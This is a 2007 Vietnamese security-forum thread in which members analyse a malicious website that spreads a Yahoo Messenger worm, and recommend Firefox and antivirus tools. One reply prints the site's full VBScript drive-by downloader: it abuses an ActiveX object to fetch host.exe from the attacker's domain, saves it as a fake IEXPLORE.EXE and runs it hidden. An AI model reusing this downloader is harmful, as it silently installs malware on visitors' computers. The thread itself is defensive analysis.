English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Web có Virus Yahoo nè , bà con nghiên cứu , đập nó đi !!!  XML
  [Question]   Web có Virus Yahoo nè , bà con nghiên cứu , đập nó đi !!! 18/05/2007 06:05:16 (+0700) | #1 | 59848
Linuxcodon
Member
[Minus]    0    [Plus]
Joined: 30/04/2007 01:02:08
Messages: 122
Offline
[Profile] [PM]
http://lovetolove.us/ , bạn em nó gởi em , nhiều quá , sinh nghi , nên nhấp thử !! Bit defender 10 , phát hiện ra !!!! Đập chúng đi bà con ơi !!!
[Up] [Print Copy]
  [Question]   Web có Virus Yahoo nè , bà con nghiên cứu , đập nó đi !!! 18/05/2007 10:03:59 (+0700) | #2 | 59902
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
on error resume next
dl = "http://lovetolove.us/host.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.EXE"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0 


Cái kiểu trang web này lâu rồi cũng còn người thích xào nấu. Ai sử dụng IE củ đều bị dính thứ đó .
Thấy biểu tượng cái file như viết bằng autoit. Sử dụng FF hay gì đó cho chắc cú. Bớt nạn nào hay nạn đó.
Xem page source của trang web đó bằng ff , mới vào là thấy đoạn code, dùng cái trình download nào về, rồi quét bằng trình diệt bình thường là thấy cái file đó.
Lại là một version mới của cái thứ worm IM sohanad gì đó nửa.
Cái soft Fasthelper cũng diệt cái này nhanh. Còn nó có protect khi lướt web kiểu này hay không thì chưa thử.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Web có Virus Yahoo nè , bà con nghiên cứu , đập nó đi !!! 18/05/2007 12:56:38 (+0700) | #3 | 59942
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
thử đi thì biết mà smilie). Không chỉ AutoIt, web đính shell cũng bị chặn. tmd vào các web serial, crack bằng IE trong khi đang chạy FastHelper thì biết smilie
[Up] [Print Copy]
  [Question]   Web có Virus Yahoo nè , bà con nghiên cứu , đập nó đi !!! 18/05/2007 21:32:29 (+0700) | #4 | 59984
tuimehack
Member
[Minus]    0    [Plus]
Joined: 28/03/2007 20:13:07
Messages: 2
Offline
[Profile] [PM]
dung mc cafe bắt được cả đống
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|